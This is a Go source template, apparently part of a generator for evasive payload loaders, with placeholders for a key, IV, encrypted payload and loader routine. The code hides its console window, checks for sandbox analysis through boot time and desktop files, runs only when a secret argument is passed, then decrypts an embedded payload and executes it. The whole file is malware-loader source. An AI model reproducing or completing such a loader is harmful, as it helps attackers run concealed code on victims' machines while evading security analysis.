package main

import (
	"os"
	"variant/crypto"
	"variant/loader"
	"variant/sandbox"
)

func init() {
	loader.HideConsoleWin()
	sandbox.BootTime()
	sandbox.GetDesktopFiles()
}

func main() {
	args := os.Args
	if len(args) < 2 {
		os.Exit(0)
	}

    {{.ArgsName}} := "{{.ArgsValue}}"
   	if {{.ArgsName}} == args[1] {
        {{.KeyName}} := []byte("{{.KeyValue}}")
        {{if .IvName}}
        {{.IvName}} := []byte("{{.IvValue}}")
        {{end}}

        {{.CipherText}} := "{{.Payload}}"
        {{.PlainText}}, _ := crypto.{{.Decrypt}}({{.CipherText}}, {{.KeyName}}{{if .IvName}}, {{.IvName}}{{end}})

        loader.{{.Loader}}({{.PlainText}})
    }
}
